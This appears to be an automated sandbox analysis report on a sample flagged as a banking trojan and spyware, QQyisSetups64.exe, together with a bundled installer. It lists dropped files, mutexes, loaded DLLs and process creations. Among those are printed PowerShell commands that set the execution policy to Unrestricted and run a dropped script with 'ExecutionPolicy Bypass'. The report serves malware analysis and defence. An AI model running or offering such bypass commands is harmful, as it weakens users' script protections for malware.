Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\{530B0790-97BF-4550-8023-6D8CB41E16CA}.tmp\360P2SP.dll 0ECA2E140F973B2011C633D4D92E512A1F77E1DA610CFE0F4538C0B451270016
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\{A44B7723-4283-41b8-B9C0-6B1983C61382}.tmp\sites.dll C1EB83993C85E01EE6AE84EB6E05744FF8C3CCC02C41D09C22286E3012EF46FC

Source: C:\Users\user\Downloads\inst.exe	Code function: String function: 6C65A916 appears 41 times
Source: C:\Users\user\Downloads\inst.exe	Code function: String function: 6C6930C1 appears 45 times
Source: C:\Users\user\Downloads\inst.exe	Code function: String function: 6C5DC2CF appears 498 times
Source: C:\Users\user\Downloads\inst.exe	Code function: String function: 00B032AD appears 39 times
Source: C:\Users\user\Downloads\inst.exe	Code function: String function: 00A7B680 appears 43 times
Source: C:\Users\user\Downloads\inst.exe	Code function: String function: 6C5DCF3C appears 34 times
Source: C:\Users\user\Downloads\inst.exe	Code function: String function: 6C5E1300 appears 104 times
Source: C:\Users\user\Downloads\inst.exe	Code function: String function: 00AF453E appears 95 times
Source: C:\Users\user\Downloads\inst.exe	Code function: String function: 6C68E86C appears 529 times
Source: C:\Users\user\Downloads\inst.exe	Code function: String function: 00AF5421 appears 859 times
Source: C:\Users\user\Downloads\inst.exe	Code function: String function: 00AF4D50 appears 86 times
Source: C:\Users\user\Downloads\inst.exe	Code function: String function: 6C68E89F appears 107 times
Source: C:\Users\user\Downloads\inst.exe	Code function: String function: 00AF5454 appears 84 times
Source: C:\Users\user\Downloads\inst.exe	Code function: String function: 00AF47DC appears 64 times
Source: C:\Users\user\Downloads\inst.exe	Code function: String function: 00AF548A appears 51 times
Source: C:\Users\user\Downloads\inst.exe	Code function: String function: 6C65A8A6 appears 43 times
Source: C:\Users\user\Downloads\inst.exe	Code function: String function: 00A7B780 appears 70 times
Source: C:\Users\user\Downloads\inst.exe	Code function: String function: 00AD4164 appears 79 times
Source: C:\Users\user\Downloads\inst.exe	Code function: String function: 6C65A6EE appears 47 times
Source: C:\Users\user\Downloads\inst.exe	Code function: String function: 6C5E1E36 appears 42 times
Source: C:\Users\user\Downloads\inst.exe	Code function: String function: 00A8CC03 appears 48 times
Source: C:\Users\user\Downloads\inst.exe	Code function: String function: 00A88675 appears 259 times
Source: C:\Users\user\Downloads\inst.exe	Code function: String function: 00A91BA2 appears 71 times
Source: C:\Users\user\Downloads\inst.exe	Code function: String function: 00AF0230 appears 36 times
Source: C:\Users\user\Downloads\inst.exe	Code function: String function: 6C68D7CC appears 53 times
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	Code function: String function: 03613CBF appears 33 times
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	Code function: String function: 03794300 appears 32 times

Source: QQyisSetups64.exe

Static PE information: invalid certificate

Source: inst[1].exe.3.dr	Static PE information: Resource name: CAB type: Microsoft Cabinet archive data, many, 1346052 bytes, 3 files, at 0x2c +A "sites.dll" +A "themes\theme_NewInstallAir.xml", number 1, 81 datablocks, 0x1 compression
Source: inst[1].exe.3.dr	Static PE information: Resource name: DLL type: Microsoft Cabinet archive data, Windows 2000/XP setup, 304652 bytes, 1 file, at 0x2c +A "360P2SP.dll", ID 808, number 1, 22 datablocks, 0x1503 compression
Source: inst[1].exe.3.dr	Static PE information: Resource name: DLL type: Microsoft Cabinet archive data, Windows 2000/XP setup, 348915 bytes, 1 file, at 0x2c +A "urlproc.dll", number 1, 22 datablocks, 0x1 compression
Source: inst[1].exe.3.dr	Static PE information: Resource name: LETTER type: Microsoft Cabinet archive data, Windows 2000/XP setup, 781 bytes, 1 file, at 0x2c +A "letter.rtf", number 1, 1 datablock, 0x1 compression
Source: inst[1].exe.3.dr	Static PE information: Resource name: LICENCE type: Microsoft Cabinet archive data, Windows 2000/XP setup, 12165 bytes, 1 file, at 0x2c +A "licence.rtf", number 1, 2 datablocks, 0x1 compression
Source: inst[1].exe.3.dr	Static PE information: Resource name: PRIVACY type: Microsoft Cabinet archive data, Windows 2000/XP setup, 11763 bytes, 1 file, at 0x2c +A "privacy.rtf", number 1, 1 datablock, 0x1 compression
Source: inst[1].exe.3.dr	Static PE information: Resource name: VIEWER type: Microsoft Cabinet archive data, Windows 2000/XP setup, 751718 bytes, 1 file, at 0x2c +A "AgreementViewer.exe", number 1, 53 datablocks, 0x1 compression
Source: inst.exe.3.dr	Static PE information: Resource name: CAB type: Microsoft Cabinet archive data, many, 1346052 bytes, 3 files, at 0x2c +A "sites.dll" +A "themes\theme_NewInstallAir.xml", number 1, 81 datablocks, 0x1 compression
Source: inst.exe.3.dr	Static PE information: Resource name: DLL type: Microsoft Cabinet archive data, Windows 2000/XP setup, 304652 bytes, 1 file, at 0x2c +A "360P2SP.dll", ID 808, number 1, 22 datablocks, 0x1503 compression
Source: inst.exe.3.dr	Static PE information: Resource name: DLL type: Microsoft Cabinet archive data, Windows 2000/XP setup, 348915 bytes, 1 file, at 0x2c +A "urlproc.dll", number 1, 22 datablocks, 0x1 compression
Source: inst.exe.3.dr	Static PE information: Resource name: LETTER type: Microsoft Cabinet archive data, Windows 2000/XP setup, 781 bytes, 1 file, at 0x2c +A "letter.rtf", number 1, 1 datablock, 0x1 compression
Source: inst.exe.3.dr	Static PE information: Resource name: LICENCE type: Microsoft Cabinet archive data, Windows 2000/XP setup, 12165 bytes, 1 file, at 0x2c +A "licence.rtf", number 1, 2 datablocks, 0x1 compression
Source: inst.exe.3.dr	Static PE information: Resource name: PRIVACY type: Microsoft Cabinet archive data, Windows 2000/XP setup, 11763 bytes, 1 file, at 0x2c +A "privacy.rtf", number 1, 1 datablock, 0x1 compression
Source: inst.exe.3.dr	Static PE information: Resource name: VIEWER type: Microsoft Cabinet archive data, Windows 2000/XP setup, 751718 bytes, 1 file, at 0x2c +A "AgreementViewer.exe", number 1, 53 datablocks, 0x1 compression

Source: QQyisSetups64.exe	Binary or memory string: OriginalFilenameV vs QQyisSetups64.exe
Source: QQyisSetups64.exe.3.dr	Binary or memory string: OriginalFilenameV vs QQyisSetups64.exe

Source: QQyisSetups64.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source: inst[1].exe.3.dr

Binary string: ZOTAC ZENFASTZENFAS XSTAR XS TAK VASEKY UKINGS TYH TXRUI TURXUN TEKISM TEELKOOUTAISU SS DSUPERSSPSTARSWAYSTARRAM SPCC SHINEDOE SHINEDIS SHINEDISKSAMSWEETREEINNO REEINN RUNENG RAMSTA S QIDAN POWERSSD NETAC SSNETAC SMICROFLA SH MICROFLASH MICROFLAS MERELAIR MAXSUNMACMEMOR LENOVO SLENOVO SLANSHIKUAIKAKINGSTEKKINGSSD_ACSC4MACSC2MACJC2MKINGSPECKINGSHARE KINGSHAR EKING SHAREKING SHAREKING SHA REKINGSANDKINGRICHKINGBANKKINGDINGKINGDIANKDATAJUNSHI INTEIFUNKIFOUNDI-FLASHHY SPEED HY SDEED HISTOR HIGHXGOWE GEIL ZENITHGAMERGALAIRD GALA GAINWARDGLOWAYGLOWA FORSAFASTDISKFASPEE FASPEEDEVTRANEEKOOEAGET SS DDOMONDERLERDRAGONDICABOFITBIOSTAR BIOSTA ASGARD ASINT ASIN APACER ANUCELL GENERIC NCARDHYNIXTECLASTTECLAS KINGFAST COLORFUL COLORFUL SSD NVME ATA KINGSTONPLEXTOR PX-PLEXTO PX-PLEXTO PX-GALAXMICRON MICRON_MLITEONITLITEONSANDISK SANDIS MKNSSDCRUNCOREEDGEPLEXTORMTFDV4-CTM4-CTCRUCIAL ADATA ADATA ADAT PNYAPACERG.SKILLOCZKINGSTONCORSAIRINTELFUJITSUTOSHIB TOSHIBASAMXUNG SAMSUNG1SAMSUN SAMSUNGWDSEAGATESTATA AVD ASDK APPLE HDD ModelASSOCIATORS OF {Win32_DiskPartition.DeviceID='%s'} where ResultClass = Win32_DiskDriveDeviceIDASSOCIATORS OF {Win32_LogicalDisk.DeviceID='%s'} where ResultClass = Win32_DiskPartitionROOT\CIMV2Index\Device\Harddisk\\.\c:%usotmSOFTWARE\360Safe\softmgr\dg{from}{ver}{mid}s.360.cn/safe/instcomp.htm?soft=425&status=%d&mid={mid}&from={from}&ver={ver}&vv=10&appkey=&usetime=%d&downrate=%d&downlen=%dl,M~UG

Source: classification engine

Classification label: mal100.bank.troj.spyw.evad.winEXE@16/34@8/14

Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	Code function: 6_2_03787B70 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,CloseHandle,	6_2_03787B70
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	Code function: 6_2_03787740 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,	6_2_03787740
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	Code function: 6_2_03787620 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,OpenProcess,	6_2_03787620

Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe

Code function: 6_2_03786C50 wsprintfW,MultiByteToWideChar,GetDriveTypeW,GetDiskFreeSpaceExW,_memset,GlobalMemoryStatusEx,swprintf,swprintf,

6_2_03786C50

Source: C:\Users\user\Desktop\QQyisSetups64.exe

Code function: 3_2_1000F260 CreateToolhelp32Snapshot,Process32FirstW,?cerr@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,?cerr@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z,CloseHandle,_wcsicmp,CloseHandle,Process32NextW,CloseHandle,

3_2_1000F260

Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe

Code function: 6_2_03786150 wsprintfW,_memset,lstrcatW,lstrcatW,lstrcatW,CoCreateInstance,wsprintfW,RegOpenKeyExW,_memset,wsprintfW,RegOpenKeyExW,_memset,RegQueryValueExW,lstrcatW,lstrcatW,lstrcatW,RegCloseKey,lstrlenW,lstrcatW,

6_2_03786150

Source: C:\Users\user\Downloads\inst.exe

Code function: 15_2_00AE0145 _memset,FindResourceW,SizeofResource,LoadResource,LockResource,

15_2_00AE0145

Source: C:\Users\user\Downloads\inst.exe

File created: C:\Program Files (x86)\360

Jump to behavior

Source: C:\Users\user\Desktop\QQyisSetups64.exe

File created: C:\Users\user\Desktop\Logs

Jump to behavior

Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\XoreaxIncredibuild_qqyissetups64_Mutex
Source: C:\Users\user\Downloads\inst.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8084:120:WilError_03
Source: C:\Users\user\Downloads\inst.exe	Mutant created: \Sessions\1\BaseNamedObjects\Q360SafeInstallerMutex
Source: C:\Users\user\Downloads\inst.exe	Mutant created: \Sessions\1\BaseNamedObjects\1830B7BD-F7A3-4c4d-989B-C004DE465EDE 1464
Source: C:\Users\user\Downloads\inst.exe	Mutant created: \Sessions\1\BaseNamedObjects\1830B7BD-F7A3-4c4d-989B-C004DE465EDE 2440
Source: C:\Users\user\Desktop\QQyisSetups64.exe	Mutant created: \Sessions\1\BaseNamedObjects\Xoreax_LogMutex_qqyissetups64
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	Mutant created: \Sessions\1\BaseNamedObjects\XoreaxIncredibuild_qqyissetups64_Mutex_user_WinSta0
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8100:120:WilError_03
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	Mutant created: \Sessions\1\BaseNamedObjects\2024.12. 3

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mtxrbs5i.uns.ps1

Jump to behavior

Source: Yara match	File source: QQyisSetups64.exe, type: SAMPLE
Source: Yara match	File source: 3.2.QQyisSetups64.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.QQyisSetups64.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.1456396278.0000000000403000.00000020.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.1279062658.0000000000401000.00000020.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe, type: DROPPED

Source: C:\Users\user\Desktop\QQyisSetups64.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales			Jump to behavior
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales			Jump to behavior

Source: C:\Users\user\Desktop\QQyisSetups64.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\QQyisSetups64.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: QQyisSetups64.exe	String found in binary or memory: es>false</StopIfGoingOnBatteries> <AllowHardTerminate>false</AllowHardTerminate> <StartWhenAvailable>true</StartWhenAvaila
Source: QQyisSetups64.exe	String found in binary or memory: es>false</StopIfGoingOnBatteries> <AllowHardTerminate>false</AllowHardTerminate> <StartWhenAvailable>true</StartWhenAvaila
Source: QQyisSetups64.exe	String found in binary or memory: le> <RunOnlyIfNetworkAvailable>true</RunOnlyIfNetworkAvailable> <IdleSettings> <StopOnIdleEnd>true</StopOnIdleEnd>
Source: QQyisSetups64.exe	String found in binary or memory: le> <RunOnlyIfNetworkAvailable>true</RunOnlyIfNetworkAvailable> <IdleSettings> <StopOnIdleEnd>true</StopOnIdleEnd>
Source: inst.exe	String found in binary or memory: /pid=%s /noreboot=1 /installer=1 /SMARTSILENCE
Source: inst.exe	String found in binary or memory: --secore-restore --360se_pid=8000041 --silent-install --not-create-mplnk
Source: inst.exe	String found in binary or memory: --secore-restore --360se_pid=8000041 --silent-install --not-create-mplnk
Source: QQyisSetups64.exe	String found in binary or memory: -ADDCUSTOMCOLORBUTTON_CAP=Add to Custom Colors

Source: C:\Users\user\Desktop\QQyisSetups64.exe

File read: C:\Users\user\Desktop\QQyisSetups64.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\QQyisSetups64.exe "C:\Users\user\Desktop\QQyisSetups64.exe"
Source: C:\Users\user\Desktop\QQyisSetups64.exe	Process created: C:\Users\user\AppData\Roaming\QQyisSetups64.exe "C:\Users\user\AppData\Roaming\QQyisSetups64.exe"
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
Source: unknown	Process created: C:\Users\user\Downloads\inst.exe C:\Users\user\Downloads\inst.exe
Source: unknown	Process created: C:\Users\user\Downloads\inst.exe C:\Users\user\Downloads\inst.exe
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Users\user\Desktop\QQyisSetups64.exe	Process created: C:\Users\user\AppData\Roaming\QQyisSetups64.exe "C:\Users\user\AppData\Roaming\QQyisSetups64.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1	Jump to behavior

Source: C:\Users\user\Desktop\QQyisSetups64.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\QQyisSetups64.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\QQyisSetups64.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\QQyisSetups64.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\QQyisSetups64.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\QQyisSetups64.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\QQyisSetups64.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\QQyisSetups64.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\QQyisSetups64.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\QQyisSetups64.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\QQyisSetups64.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\Desktop\QQyisSetups64.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\QQyisSetups64.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\QQyisSetups64.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\QQyisSetups64.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\QQyisSetups64.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\QQyisSetups64.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\QQyisSetups64.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\QQyisSetups64.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\QQyisSetups64.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\QQyisSetups64.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\QQyisSetups64.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\QQyisSetups64.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\QQyisSetups64.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\QQyisSetups64.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\QQyisSetups64.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\QQyisSetups64.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\QQyisSetups64.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\QQyisSetups64.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\QQyisSetups64.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\QQyisSetups64.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\QQyisSetups64.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\QQyisSetups64.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\QQyisSetups64.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\QQyisSetups64.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\QQyisSetups64.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\QQyisSetups64.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\QQyisSetups64.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\QQyisSetups64.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\QQyisSetups64.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\QQyisSetups64.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\QQyisSetups64.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\QQyisSetups64.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\QQyisSetups64.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\QQyisSetups64.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\QQyisSetups64.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\QQyisSetups64.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\QQyisSetups64.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\QQyisSetups64.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\QQyisSetups64.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\QQyisSetups64.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\QQyisSetups64.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\QQyisSetups64.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\QQyisSetups64.exe	Section loaded: msv1_0.dll	Jump to behavior
Source: C:\Users\user\Desktop\QQyisSetups64.exe	Section loaded: ntlmshared.dll	Jump to behavior
Source: C:\Users\user\Desktop\QQyisSetups64.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	Section loaded: dinput8.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	Section loaded: inputhost.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	Section loaded: devenum.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	Section loaded: msdmo.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QQyisSetups64.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
